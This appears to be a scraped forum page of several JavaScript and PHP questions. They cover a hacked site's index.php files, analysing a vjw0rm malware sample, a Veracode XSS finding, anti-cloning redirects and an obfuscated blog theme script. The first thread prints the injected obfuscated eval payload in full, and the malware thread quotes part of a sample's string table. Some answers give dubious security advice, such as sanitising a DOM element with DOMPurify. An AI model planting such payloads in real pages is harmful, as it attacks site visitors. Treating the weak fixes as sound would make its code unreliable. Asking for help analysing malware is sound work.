All my index.php files on my website got hacked - javascript

All index.php files on my website got hacked with the code injection in the body tag, see below. Does anyone know how they did it and if there is way to look for it how prevent it?
echo "<body><script language="javascript">try { function BwrLMVnkPmRbZYpfwLH(MLJOynjaY){var iMgpLZHO="",aVwbJg,oKONbIZB,gdGJUWTs,siAOty,hPaiwMZ,NxynbqCA,VxXqcPIGHh,UclXTRxDsh,bRLAlhars;var nGBCFoc="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var OZymdhDIRb="";for(UclXTRxDsh=0;UclXTRxDsh<MLJOynjaY.length;){siAOty=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));hPaiwMZ=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));bRLAlhars=BwrLMVnkPmRbZYpfwLH;NxynbqCA=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));VxXqcPIGHh=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));aVwbJg=(siAOty<<2)+(hPaiwMZ>>4);oKONbIZB=((hPaiwMZ&15)<<4)+(NxynbqCA>>2);gdGJUWTs=((NxynbqCA&3)<<6)+VxXqcPIGHh;bRLAlhars=bRLAlhars.toString();iMgpLZHO+=String.fromCharCode(aVwbJg);if(NxynbqCA!=64)iMgpLZHO+=String.fromCharCode(oKONbIZB);if(VxXqcPIGHh!=64)iMgpLZHO+=String.fromCharCode(gdGJUWTs);}bRLAlhars=bRLAlhars.replace(/\W/g,"");bRLAlhars=bRLAlhars.split("").reverse().join("");for(UclXTRxDsh=0;UclXTRxDsh<iMgpLZHO.length;UclXTRxDsh++)OZymdhDIRb+=String.fromCharCode(iMgpLZHO.charCodeAt(UclXTRxDsh%iMgpLZHO.length)^bRLAlhars.charCodeAt(UclXTRxDsh%bRLAlhars.length));return eval(OZymdhDIRb);}BwrLMVnkPmRbZYpfwLH("QnJpZEhETVl6b0xBVmxnBBQGRRsOBgYDAExOUgUHDzQhNwwcXScKNzUsCSY5ESwAChtrUAgOERIfBEpFekZbawESFQ8ICWE/MygED21USFF1WmleUWUKMwYgCAFBKxcIDws7aGdsUlZvUm9tZioUEwkuCEEBFAROVFJWOxYmOX5HSxVULyEBEGobPTl3BQ17CxMOUVdOdEJTRRQILhwFFioMfDY3CBp7URgDIRY2FzAFDzFaBgAcCAIPTEg=");} catch(e){}</script>";*

I would suggest you to use HTML Purifier.
HTML Purifier is a standards-compliant
HTML filter library written in PHP.
HTML Purifier will not only remove all
malicious code (better known as
XSS) with a thoroughly audited,
secure yet permissive whitelist, it
will also make sure your documents are
standards compliant
Also, use mysql_real_escape_string function before any values you want to insert/update into the database, and use intval before the numbers to minimize the risk.

The javascript decodes and evals the following binary string:
0000: 2935 3f1e 1070 7a63 286e 6d69 626b 742b )5?..pzc(nmibkt+
0010: 2037 6974 7d55 495b 4d50 0f45 6244 7154 7it}UI[MP.EbDqT
0020: 5b72 617d 4f55 7e5a 0e34 674d 6373 7767 [ra}OU~Z.4gMcswg
0030: 3937 1b2e 372a 4d40 7767 7c6e 0f5a 5f67 97..7*M#wg|n.Z_g
0040: 4c55 2124 2f1c 1c32 1a1a 2937 5e6b 6a43 LU!$/..2..)7^kjC
0050: 5d75 efbf bd4e 7367 4c79 5aef bfbd 0423 ]u...NsgLyZ....#
0060: 1a0c 2322 0820 0f4f 707c 4a5c 6929 4279 ..#". .Op|J\i)By
0070: 6b26 6c74 3b32 3538 5264 526a 1c15 0251 k<258RdRj...Q
0080: 3c6b 6c78 6a25 736e 7d0f 7779 2367 705b <klxj%sn}.wy#gp[
0090: 3923 291a 273f 205c 7262 6c62 5b63 640f 9#).'? \rblb[cd.
00a0: 726f 7a6e 233d 227b 5611 7e45 5348 575b rozn#="{V.~ESHW[
00b0: 6936 6555 6e67 6461 2527 223e 3c2f 6b6c i6eUngda%'"></kl
00c0: 786a 2573 6e7d 0f77 7923 6770 5b39 2329 xj%sn}.wy#gp[9#)
00d0: 1a27 3f3e .'?>
which seems a bit pointless as most javascript engines should just throw a syntax error. Perhaps it causes an overflow in some browser.
As to how they actually did it, the code you posted is exploiting a client-side bug, and they probably compromised your server with an unrelated attack. It will depend how your content is generated but an SQL injection or filesystem overwrite are possible. Do you do anything like eval unescaped SQL or run dynamic exec-family functions from PHP?

Related

Currently analysing a sample of the vjw0rm js malware but I don't know how to find the hidden ioc

So for the last couple of days I have been practicing some basic malware analysis on mainly macro malware like Agent Tesla but this time I am trying to figure out how solve the logic of the vjworm javascript malware and so far I have managed to deobfuscate the code using a combination of both manual deobfuscation and an online tool.
This is the sample in it's deobfuscated form https://pastebin.com/qRBKix6V
I am not able to post the entire thing here on Stackoverflow so I posted it on pastebin because it's just too large for the post limit of 30000 characters so I will post a snippet of the code instead and it's a piece of the code I am struggling to wrap my head around where it looks to be base64
and I did try convert it into text using a base64 to text online tool and I was promptly told that this was actually code and that I should convert to the bin format and I could read the output before I downloaded it and it was just a bunch of random letters with no meaning at all
What does this mean?.
function t() {
var Nd = ["W68xWPnGW59PWQiEnaC", "yMeBqSoNWPxdO8kT", "omkdW6ddQq", "q2XVC2u", "W7/dPCkWWPpdNfldVG", "WOHnWONcTtXLWPH+WQPb", "sSkzfq", "A3LWzsaVDhiGiG", "vbVdSSk7WOK", "Evz3tuK", "fSoHxmk9C1ldPq", "WOtcLSozW6S", "W7ebWPBcRaCxW5BcJrn0", "Ahr0CdOVl2DYyq", "atP8ssW", "gL3cMG", "C3bSAxq", "u2XLzxa", "B3bLBG", "tfNdJGddR8oFqSkHW7u", "W4RdPCo4aN/cIw9Ifmk4WPv1", "Dg9tDhjPBMC", "BsS0ga", "rhhcT3lcKXpcT8keW4tdMG", "jvjNtMuL", "WRpcTCoyW6/cQq", "mhWZFdr8mxWY", "ue9tva", "W5SibaddMmkMumo4", "mZmWt3Lsrvfe", "FY3dPHZcOcdcJ8kSWQJdQa", "lrJcQ8oRWQFdGSoaWPW6W4y", "aCo/fvxdJMuaD8oyW6C", "W5nKW68+ntGvEConeZ0", "W4pcJSkO", "Dub7or8", "hGnwAbvOcSo6W79/", "BgVcGwJcLG", "uMvNv3jPDgu", "xhjVB3rCC2vJDq", "W6LEA19k", "W4TgW6VdR3i", "WOTqgrldVmkDEmo4", "W7FcVSk1CmoBpW", "BuDAtKS", "WPNcNhqRWQ0", "t8kAztlcQmkrhW", "W5tdLahdNCoEW7KYmSkacW", "fSo0W4xcMN0XW5TDi2S", "tCoEWRJcVutcP2SJn8oMWQi", "twLJCM9ZB2z0xa", "WO9uwKZcHmk0CSoniSkIW5W", "WRZdJGtdI8od", "ef/dM8kau8olW6jFn8k6", "yxbWBhK", "jxZcVSkgWPe", "F8oPvW", "mJy0vhv2vgXi", "WRtdVMm1", "qCk4m8kNAM3dSHRdIq", "F2RcQG", "pCo5W6e7oaysu8oX", "hCodowFdS8osqSo5y8kogKFdVq", "WRyAkmk0kHuHFwS", "nxW0FdH8mW", "shHSz1O", "sXpdUmkUWO3dNCo7k8oWza", "WRiwj8kRlHa", "yMvRBKC", "AxrLBq", "WRJdH8ouWQRdKa", "u2HLBgWUqxbWBa", "W6PdW50", "W53dOCk0WPC", "oCk5xwJcSq", "atapCSoCWQxdMSk6", "zLDLuhG", "juVdHCoXW67cJxZdVSkLW4y", "ntG1odD2qKrRzNG", "ntuWmtK1DxjtC2nx", "we1msfruua", "ruPUEhu", "BG9MW58qWPJcPfddK8kt", "W7KibqBdKa", "jGVcQSk0W5JdLmkUi8kR", "W6nfA11+", "uxvPDa", "d8kDEvxcKa", "renDcdS", "W5/dVc7dVmo0", "WR5keSkhW7jdyCkca8o0sq0d", "WOVcVCkaDGS", "jedcRmo+W5NcNSoXoCoVCmkVWP8", "Bw92zu5LEhq", "wefJW5mcWP/cQeZdGSoy", "Ffz8", "EujSyvi", "yxrPBMDtExn0zq", "zgVcOwS", "h2hcOCkxWRRdOmkwqW", "DuPcfZ/cP3y", "rJ0XdLO", "CSonCJy+", "jJitWOhdHcldS8opbmkp", "rMLSzq", "ChnHBg1Zltu1", "betdKmkftSoC", "W6ZdTmkfWPhdMq", "uhjVz3jHBurHDa", "mNWWFdf8n3W2Fa", "FwPxW4BcMW", "v2LUzg93C1XdDq", "WPqHWRe", "xe1Py3jVC29MDa", "vxL4Cu0", "rgLZCgXHEu5HBq", "wuvt", "WQtcH8kLWPbpydzfWPRcVa", "W7vcW6BdQ3a", "u2nODgfZA3mGlW", "sw5ZDgfUy2vZtW", "odCZsgXrs2Do", "qSk+mvdcUa", "yxrfBMq", "vwDoC1u", "W7HfW5KHW6KFW6u", "zwXS", "z8kNcNTsWR3dKSoJWRFcVG", "u0XbD2O", "CMvWBgfJzq", "W6LiW4VcRXvNW47cJfro", "W4rrW7C", "yuXutgq", "v1nJCMLWDc5tAa", "W6ddVW7dJSoJ", "r1DNs2K", "wgDZtwq", "t3bLBLrLEhrgAq", "t3rYweK", "W5tdRSkoWRJdNa", "xfnVzNr3yxjLxa", "tqpcPt3cRZjFWP3dHH0", "zmkafgVcRSk1W6vYrmkn", "fmoGDSkksfNdGqK", "WONcU8k4WPbU", "qLFdR8k9uG", "qmoqwX8CW7bgzq", "Emo4W4hcKvS1W58EAq", "seTmtvXtt0zuvW", "uKvhx1nA", "CML0EwnLBNrLCG", "DCkclIO", "DgvTCa", "lK5fvfXgCMfTzq", "nKD6B3fbra", "BgXUvLa", "g2/dQSor", "mZq0mtjzv0rHwuG", "oCkNvf7cSsn5tu5t", "y29Kzeu", "udDfs09xqJzhsa", "rmo2W6xcTKK", "v3jPDgu"];
This is the malware sample in it's obfuscated form https://pastebin.com/xukFtPT7
My main goal here is to get an understanding about how the code functions and how it eventually get's to the ioc like ip adresses and domain names.
So far I have done some research around this malware but I found very little regarding how to reverse engineer this malware and the only resource I found did not have the same code as me.
I am by no means an expert at reverse engineering malware and I am not a master programmer by any means but I am able to read,write basic programs.
But on the other hand I have watched many tutorials and read many resources regarding malware from different families and how to best analyse them using a combination of both tools and manual malware analysis both static and dynamic.
What should I do now?

How to fix Veracode - Cross site scripting - CWE ID 80 - Basic XSS - use of $(item) in .each function

So, when our web application is scanned for Veracode, I get many Cross-Site Scripting flaws,
"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)"(CWE ID 80).
And, out of few flaws we have, I could not figure out how to fix this particular scenario.
Below is my piece of code -
$(".ui-dialog-buttonset .ui-button:visible").each(function(index, item) {
var label = $(item).text();
if (label == "Save" || label == "Create")
$(item).click();
});
I can see flaw reported on $(item).text(); and $(item).click(); lines.
I understand that, for text I can use something like DOMPurify.sanitize to clean the string.
But, I could not understand, why veracode is reporting for $(item).click();
Is it because the $(item) itself is not safe?
If yes then, how do I fix it?
I would greatly appreciate any help in this.
Okay, found fix from DOMPurify library.
You can sanitize DOM element too using DOMPurify.
So, below code works -
item = DOMPurify.sanitize(item, {SAFE_FOR_JQUERY:true});

How to use JavaScript or/and PHP, to detect a website/page being stolen/cloned and then redirect reader back to my website

I found hundreds of cloned versions of my website.
Whoever is doing that are using some code that clones my web pages, changes my website name mydomain.com to clone1.com, clone2.com, clone3.com etc and this makes it impossible to use a simple JS or PHP to check if the header URL is = to mysite.com then redirect.
It also does not work using the .htaccess
For this reason I have created this code:
<script type="text/javascript">
if (window.location.href== "http://clone1.com/cat1/{{{ $title->id }}}-{{ (Str::slug($title->title)) }}/cat2/{{ $se->n }}/cat3/{{ $episode->ep_n }}")
{
window.location.href = 'http://google.com/';
}
</script>
This script completes its purpose but is too long and is also very restrictive because it must contain the exact URL.
I'm looking to do this:
<script type="text/javascript">
if (window.location.href== "http://
//contains this part in its URL
clone1.com , clone2.com , clone3.com , clone4....
}}")
{
window.location.href = 'http://google.com/';
}
</script>
How can I create a global JS (JavaScript), that would detect if the current page is not on my domain and then redirect the reader to my domain and the same page?
Many thanks
1. Best Solution - Early Detection
Depending on your main traffic source, it is possible to detect who is scrapping you and block them based on their IP, Headers, number of page views and other data, using PHP & HTACCESS.
I really like this answer on the StackOverflow, that discusses almost all the options available for early detection.
How to detect fake users ( crawlers ) and cURL
2. Plugins & Extensions for Open Source Content Management Systems
Wordpress
If using Wordpress CMS, you can try some plugins, like WordFence, that can detect and block fake Google Crawlers, block based on the number of page views etc.
Other CMS
If you can't find a similar solution for your CMS of choice, consider to ask a community for a help with creating the solution like that, as I believe many people could benefit from it.
3. Solution for already stolen content with JavaScript
Sometimes the easiest road to hide something in JS, is to actually HIDE something by OBFUSCATING and by hiding in multiple important files. For example, obfuscate some important file on your website without which the website just wouldn't work properly.
For example, put an obfuscated version of the code below somewhere in JS file in the header, Obfuscate this code using any free services online or download your own library on Github:
Non-Obfuscated:
w='mysite.com'; // Current URL e.g. 'mysite.com/category1/page2/'
function check_origin(){
var check = 587;
if(window.location.hostname != w){
window.location.href = w;
}
return check;
}
var check = check_origin();
Obfuscated example:
var _0x303e=["\x6D\x79\x73\x69\x74\x65\x2E\x63\x6F\x6D","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x72\x65\x66"];w= _0x303e[0];function check_origin(){var check=587;if(window[_0x303e[2]][_0x303e[1]]!= w){window[_0x303e[2]][_0x303e[3]]= w};return check}var check=check_origin()
Now put an additional code in some Footer JS File, to verify the code above wasn't modified in any way:
Non-Obfuscated example:
if(w!=='mysite.com'||check == false || typeof check == 'undefined' || check !== 587 ){
window.location.href = 'mysite.com';
}
Obfuscated:
var _0x92bb=["\x6D\x79\x73\x69\x74\x65\x2E\x63\x6F\x6D","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(w!== _0x92bb[0]|| check== false|| typeof check== _0x92bb[1]|| check!== 587){window[_0x92bb[3]][_0x92bb[2]]= _0x92bb[0]}
I have used free online service from Google's search results for the term "Free Online JS Obfuscator:
https://javascriptobfuscator.com/Javascript-Obfuscator.aspx
4. Fight thieves with available methods e.g. Request a Ban from Search Engines – The Digital Millennium Copyright Act of 1998
Here is a blog-post that describes what to do when someone is stealing your content.
https://lorelle.wordpress.com/2006/04/10/what-do-you-do-when-someone-steals-your-content/
You can investigate who is doing that and report them to their partners, search engines, advertisers - to disrupt their business.
Depending on their country of origin and yours, it is maybe even possible to sue them and win.
why not check if hostname is your ?
if(window.location.hostname != 'mysite.com'){
window.location.href = 'http://google.com/';
}

How can I decode this obfuscated javascript?

I am in the process of setting up a blog through blogger.com and used a template from veethemes.com to get me started.
However, I noticed that there's an obfuscated script in the template and I'd prefer to know what it does to ensure that nothing untowards or unwanted is being done.
The code is as follows:
var _0x378a=["\x6B\x20\x45\x28\x73\x2C\x6E\x29\x7B\x79\x20\x73\x2E\x77\x28\x2F\x3C\x5C\x2F\x3F\x28\x3F\x21\x53\x5C\x73\x2A\x5C\x2F\x3F\x29\x5B\x61\x2D\x7A\x5D\x5B\x61\x2D\x54\x2D\x39\x5D\x2A\x5B\x5E\x3C\x3E\x5D\x2A\x3E\x2F\x4C\x2C\x22\x22\x29\x2E\x4B\x28\x2F\x5C\x73\x2B\x2F\x29\x2E\x31\x37\x28\x30\x2C\x6E\x2D\x31\x29\x2E\x5A\x28\x27\x20\x27\x29\x7D\x6B\x20\x31\x31\x28\x65\x2C\x74\x2C\x6E\x2C\x68\x2C\x63\x2C\x62\x2C\x71\x29\x7B\x35\x20\x72\x3D\x6A\x2E\x66\x28\x65\x29\x3B\x35\x20\x69\x3D\x6A\x2E\x66\x28\x6E\x29\x3B\x35\x20\x63\x3D\x63\x3B\x35\x20\x62\x3D\x62\x3B\x35\x20\x73\x3D\x22\x22\x3B\x35\x20\x6F\x3D\x72\x2E\x31\x39\x28\x22\x41\x22\x29\x3B\x35\x20\x61\x3D\x58\x3B\x35\x20\x70\x3D\x22\x22\x3B\x35\x20\x31\x36\x3D\x22\x75\x2E\x4D\x28\x57\x2E\x38\x2C\x20\x27\x31\x30\x27\x2C\x20\x27\x31\x32\x3D\x59\x2C\x20\x31\x33\x3D\x31\x34\x2C\x20\x31\x38\x3D\x78\x2C\x20\x31\x35\x3D\x78\x2C\x20\x4F\x2C\x20\x4E\x27\x29\x3B\x20\x79\x20\x50\x3B\x22\x3B\x49\x28\x6F\x2E\x51\x3E\x3D\x31\x29\x7B\x73\x3D\x27\x3C\x33\x20\x36\x3D\x22\x56\x2D\x55\x22\x3E\x3C\x61\x20\x38\x3D\x22\x27\x2B\x74\x2B\x27\x22\x3E\x3C\x41\x20\x36\x3D\x22\x52\x22\x20\x76\x3D\x22\x27\x2B\x6F\x5B\x30\x5D\x2E\x76\x2E\x77\x28\x2F\x73\x5C\x42\x5C\x64\x7B\x32\x2C\x34\x7D\x2F\x2C\x27\x73\x27\x2B\x31\x6F\x29\x2B\x27\x22\x20\x31\x71\x3D\x22\x22\x2F\x3E\x3C\x2F\x61\x3E\x3C\x2F\x33\x3E\x27\x3B\x61\x3D\x31\x73\x7D\x35\x20\x67\x3D\x27\x3C\x33\x20\x36\x3D\x22\x31\x72\x22\x3E\x3C\x33\x20\x36\x3D\x22\x31\x74\x22\x3E\x3C\x33\x20\x36\x3D\x22\x43\x22\x3E\x3C\x37\x20\x36\x3D\x22\x31\x61\x22\x3E\x27\x2B\x62\x2B\x27\x3C\x2F\x37\x3E\x3C\x37\x20\x36\x3D\x22\x31\x70\x22\x3E\x3C\x61\x20\x38\x3D\x22\x27\x2B\x74\x2B\x27\x23\x31\x6D\x22\x3E\x27\x2B\x63\x2B\x27\x3C\x2F\x61\x3E\x3C\x2F\x37\x3E\x3C\x2F\x33\x3E\x3C\x44\x3E\x3C\x61\x20\x38\x3D\x22\x27\x2B\x74\x2B\x27\x22\x3E\x27\x2B\x6E\x2B\x27\x3C\x2F\x61\x3E\x3C\x2F\x44\x3E\x3C\x33\x20\x36\x3D\x22\x43\x20\x31\x66\x22\x3E\x3C\x37\x20\x36\x3D\x22\x71\x22\x3E\x31\x65\x20\x31\x6E\x20\x27\x2B\x71\x2B\x27\x3C\x2F\x37\x3E\x3C\x37\x20\x36\x3D\x22\x68\x22\x3E\x31\x64\x20\x27\x2B\x68\x2B\x27\x3C\x2F\x37\x3E\x3C\x2F\x33\x3E\x3C\x2F\x33\x3E\x27\x2B\x73\x2B\x27\x3C\x33\x20\x36\x3D\x22\x31\x62\x22\x3E\x3C\x70\x3E\x27\x2B\x45\x28\x72\x2E\x6D\x2C\x61\x29\x2B\x27\x20\x5B\x2E\x2E\x2E\x2E\x2E\x5D\x3C\x2F\x70\x3E\x3C\x2F\x33\x3E\x3C\x2F\x33\x3E\x27\x3B\x72\x2E\x6D\x3D\x67\x7D\x3B\x75\x2E\x31\x63\x3D\x6B\x28\x29\x7B\x35\x20\x65\x3D\x6A\x2E\x66\x28\x22\x31\x67\x22\x29\x3B\x49\x28\x65\x3D\x3D\x31\x68\x29\x7B\x75\x2E\x31\x6C\x2E\x38\x3D\x22\x4A\x3A\x2F\x2F\x46\x2E\x47\x2E\x6C\x22\x7D\x65\x2E\x48\x28\x22\x38\x22\x2C\x22\x4A\x3A\x2F\x2F\x46\x2E\x47\x2E\x6C\x2F\x22\x29\x3B\x65\x2E\x48\x28\x22\x31\x6B\x22\x2C\x22\x31\x6A\x22\x29\x3B\x65\x2E\x6D\x3D\x22\x31\x69\x2E\x6C\x22\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x64\x69\x76\x7C\x7C\x76\x61\x72\x7C\x63\x6C\x61\x73\x73\x7C\x73\x70\x61\x6E\x7C\x68\x72\x65\x66\x7C\x7C\x7C\x74\x61\x67\x7C\x63\x6F\x6D\x6D\x65\x6E\x74\x7C\x7C\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x7C\x64\x61\x74\x65\x7C\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x63\x6F\x6D\x7C\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C\x7C\x7C\x7C\x7C\x61\x75\x74\x68\x6F\x72\x7C\x7C\x7C\x7C\x77\x69\x6E\x64\x6F\x77\x7C\x73\x72\x63\x7C\x72\x65\x70\x6C\x61\x63\x65\x7C\x32\x34\x7C\x72\x65\x74\x75\x72\x6E\x7C\x7C\x69\x6D\x67\x7C\x7C\x6D\x65\x74\x61\x7C\x68\x32\x7C\x73\x74\x72\x69\x70\x54\x61\x67\x73\x7C\x77\x77\x77\x7C\x76\x65\x65\x74\x68\x65\x6D\x65\x73\x7C\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x7C\x69\x66\x7C\x68\x74\x74\x70\x7C\x73\x70\x6C\x69\x74\x7C\x69\x67\x7C\x6F\x70\x65\x6E\x7C\x72\x65\x73\x69\x7A\x61\x62\x6C\x65\x7C\x73\x63\x72\x6F\x6C\x6C\x62\x61\x72\x73\x7C\x66\x61\x6C\x73\x65\x7C\x6C\x65\x6E\x67\x74\x68\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x69\x6D\x67\x7C\x62\x72\x7C\x7A\x30\x7C\x6D\x65\x64\x69\x61\x7C\x70\x6F\x73\x74\x7C\x74\x68\x69\x73\x7C\x73\x75\x6D\x6D\x61\x72\x79\x5F\x6E\x6F\x69\x6D\x67\x7C\x35\x35\x30\x7C\x6A\x6F\x69\x6E\x7C\x77\x69\x6E\x64\x6F\x77\x4E\x61\x6D\x65\x7C\x72\x6D\x7C\x77\x69\x64\x74\x68\x7C\x68\x65\x69\x67\x68\x74\x7C\x36\x30\x30\x7C\x74\x6F\x70\x7C\x70\x6F\x70\x75\x70\x7C\x73\x6C\x69\x63\x65\x7C\x6C\x65\x66\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x74\x61\x67\x73\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x65\x78\x63\x65\x72\x70\x74\x7C\x6F\x6E\x6C\x6F\x61\x64\x7C\x6F\x6E\x7C\x70\x6F\x73\x74\x65\x64\x7C\x70\x6F\x73\x74\x5F\x6D\x65\x74\x61\x7C\x61\x74\x74\x72\x69\x5F\x62\x75\x74\x69\x6F\x6E\x7C\x6E\x75\x6C\x6C\x7C\x56\x65\x65\x54\x68\x65\x6D\x65\x73\x7C\x64\x6F\x66\x6F\x6C\x6C\x6F\x77\x7C\x72\x65\x6C\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x63\x6F\x6D\x6D\x65\x6E\x74\x73\x7C\x62\x79\x7C\x37\x30\x30\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x73\x7C\x73\x74\x79\x6C\x65\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x63\x6F\x6E\x74\x61\x69\x6E\x65\x72\x7C\x73\x75\x6D\x6D\x61\x72\x79\x69\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x68\x65\x61\x64\x65\x72","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];
eval(function(_0x6c60x1,_0x6c60x2,_0x6c60x3,_0x6c60x4,_0x6c60x5,_0x6c60x6)
{_0x6c60x5=function(_0x6c60x3){return (_0x6c60x3<_0x6c60x2?_0x378a[4]:_0x6c60x5(
parseInt(_0x6c60x3/_0x6c60x2)))+((_0x6c60x3=_0x6c60x3%_0x6c60x2)>35?String[_0x378a[5]]
(_0x6c60x3+29):_0x6c60x3.toString(36))};if(!_0x378a[4][_0x378a[6]]
(/^/,String)){while(_0x6c60x3--){_0x6c60x6[_0x6c60x5(_0x6c60x3)]=_0x6c60x4[_0x6c60x3]||_0x6c60x5(_0x6c60x3)};
_0x6c60x4=[function(_0x6c60x5){return _0x6c60x6[_0x6c60x5]}];_0x6c60x5=function(){return _0x378a[7]};_0x6c60x3=1;};
while(_0x6c60x3--){if(_0x6c60x4[_0x6c60x3])
{_0x6c60x1=_0x6c60x1[_0x378a[6]]( new
RegExp(_0x378a[8]+_0x6c60x5(_0x6c60x3)+_0x378a[8],_0x378a[9]),
_0x6c60x4[_0x6c60x3])}};return _0x6c60x1;}(_0x378a[0],62,92,_0x378a[3]
[_0x378a[2]](_0x378a[1]),0,{}));
I was able to decode the first part using ddecode.com and came up with the following:
var _0x378a=["k E(s,n){y s.w(/<\/?(?!S\s*\/?)[a-z][a-T-9]*[^<>]*>/L,"").K(/\s+/).17(0,n-1).Z(' ')}k 11(e,t,n,h,c,b,q){5 r=j.f(e);5 i=j.f(n);5 c=c;5 b=b;5 s="";5 o=r.19("A");5 a=X;5 p="";5 16="u.M(W.8, '10', '12=Y, 13=14, 18=x, 15=x, O, N'); y P;";I(o.Q>=1){s='<3 6="V-U"><a 8="'+t+'"><A 6="R" v="'+o[0].v.w(/s\B\d{2,4}/,'s'+1o)+'" 1q=""/></a></3>';a=1s}5 g='<3 6="1r"><3 6="1t"><3 6="C"><7 6="1a">'+b+'</7><7 6="1p"><a 8="'+t+'#1m">'+c+'</a></7></3><D><a 8="'+t+'">'+n+'</a></D><3 6="C 1f"><7 6="q">1e 1n '+q+'</7><7 6="h">1d '+h+'</7></3></3>'+s+'<3 6="1b"><p>'+E(r.m,a)+' [.....]</p></3></3>';r.m=g};u.1c=k(){5 e=j.f("1g");I(e==1h){u.1l.8="J://F.G.l"}e.H("8","J://F.G.l/");e.H("1k","1j");e.m="1i.l"}","|","split","|||div||var|class|span|href|||tag|comment|||getElementById||date||document|function|com|innerHTML||||author||||window|src|replace|24|return||img||meta|h2|stripTags|www|veethemes|setAttribute|if|http|split|ig|open|resizable|scrollbars|false|length|article_img|br|z0|media|post|this|summary_noimg|550|join|windowName|rm|width|height|600|top|popup|slice|left|getElementsByTagName|article_tags|article_excerpt|onload|on|posted|post_meta|attri_bution|null|VeeThemes|dofollow|rel|location|comments|by|700|article_comments|style|article_container|summaryi|article_header","","fromCharCode","replace","\w+","\b","g"];
If I remove the script, the site breaks in certain places like Read More no longer cuts off the article on the home page and post headers are no longer visible, etc.
Any help in decoding this or tips on tools that may be available that would help me would be much appreciated.
Just remove eval in the code and throw it in the developer console.

executing js via cfhttp

Im trying to execute a some JS code via a background task.
Im using a gateway which works similar to paypal, i.e. once payment details are taken a response is sent back to a listener on my server (this could be immediate or several minutes later)
Once a response is received by the listener (listener.cfm), using cfhttp im calling a file (runPixCode.cfm) which has some trigger code.
Because runPixCode.cfm is not rendered by the browser the JS is not executing.
Also to prove whether this worked or not, im getting the JS to call another file (provethisiscalled.cfm) which write a log to a txt file.
If i put the following straight after the cfhttp call, i can see an entry in the log file. This assures me there is no issue with the JS providing its rendered by the browser.
<cfoutput>#cfhttp.FileContent#</cfoutput><cfabort>
However, doesnt work with a background task. I dont know how else to deal with this, any suggestions appreciated.
listener.cfm
--Does a bunch of logic--
<cfif paymentsuccessful>
<CFHTTP URL="www.mysite.com/runPixCode.cfm" METHOD="post" timeout="12" resolveurl="true">
<CFHTTPPARAM NAME="TrackingId" VALUE="#trackingId#" TYPE="FormField">
</CFHTTP>
</cfif>
runPixCode.cfm
<SCRIPT language="JavaScript">
var axel = Math.random()+"";
var a = axel * 1000;
document.write('<IFRAME SRC="http://www.mysite.com/provethisiscalled.cfm?codearea=landing&num='+ a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>');
</SCRIPT>
<NOSCRIPT><IFRAME SRC="http://www.mysite.com/provethisiscalled.cfm?codearea=landing&num=1" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME> </NOSCRIPT>
provethisiscalled.cfm
<cfloop collection=#ARGUMENTS.triggerParams# item="key">
<cfset docLogging = docLogging & chr(13) & "#key# = " & ARGUMENTS.triggerParams[key]>
</cfloop>
<cffile action="append" file="c:\serverlocation\someDir\triggerlog.txt" output="#docLogging#" addnewline="YES" >
Writing an iframe is not going to work, nor is javascript, because all of these processes are being called by applications, not by browsers.
So with that, you have to get creative. First, what are you really attempting to do?
If your purpose is to determine whether or not a file has been called or executed, use <cflog> or write an entry to a database.
If you are trying to pass an HTTP call from listener.cfm to runPixCode.cfm, use <cfhttp> instead of an iframe.
If your purpose is actually to execute JavaScript as part of this automated process (it isn't, but this is cool), you can execute JavaScript in your CF/Java server through Rhino, which is not incredibly simple, but you can get code snippets by googling. Rhino is included with ColdFusion as js.jar, so there are no special files to download to make it work.

Categories

Resources